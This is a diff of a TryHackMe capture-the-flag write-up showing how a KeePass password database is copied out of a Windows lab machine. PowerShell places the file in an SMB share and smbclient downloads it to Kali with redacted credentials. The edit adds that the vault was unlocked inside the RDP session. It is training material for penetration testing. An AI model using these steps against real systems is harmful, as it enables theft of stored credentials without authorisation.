Valikahn/TryHackMe-Jr-Penetration-Tester/WRITEUPS/forward.md

 C:\Users\<REDACTED>\Documents\Database.kdbx
 ```

-### Moving the Database Through SMB
+### Moving the KeePass Database Through SMB

-The `Downloads` SMB share was writable, but its local backing path first had to be confirmed from Windows:
+The `Downloads` SMB share was readable from Kali and was also usable as a file transfer point from the Windows session.
+Before copying the file, I confirmed the local backing path of the share from Windows:

 ```powershell
 Get-SmbShare -Name Downloads | Select-Object Name,Path,Description
 ```

-The KeePass database was copied into the share path:
+This showed that the share pointed to C:\Downloads, so the KeePass database could be copied into that location:

 ```powershell
 Copy-Item -Path "C:\Users\<REDACTED>\Documents\Database.kdbx" -Destination "C:\Downloads\Database.kdbx" -Force
 ```

-It was then downloaded from Kali:
+The file was then pulled down from Kali using smbclient:

 ```bash
 smbclient //<TARGET_IP>/Downloads -U 'ctf.local/<REDACTED>%<REDACTED>' -c 'get Database.kdbx'
 ```

+This transfer was useful for offline analysis and confirmed that the database could be moved out of the Windows session.
+However, the successful credential recovery was completed from the KeePass application inside the RDP session, where the database unlocked using the selected Windows User Account option.

 ### Reviewing the KeePass Database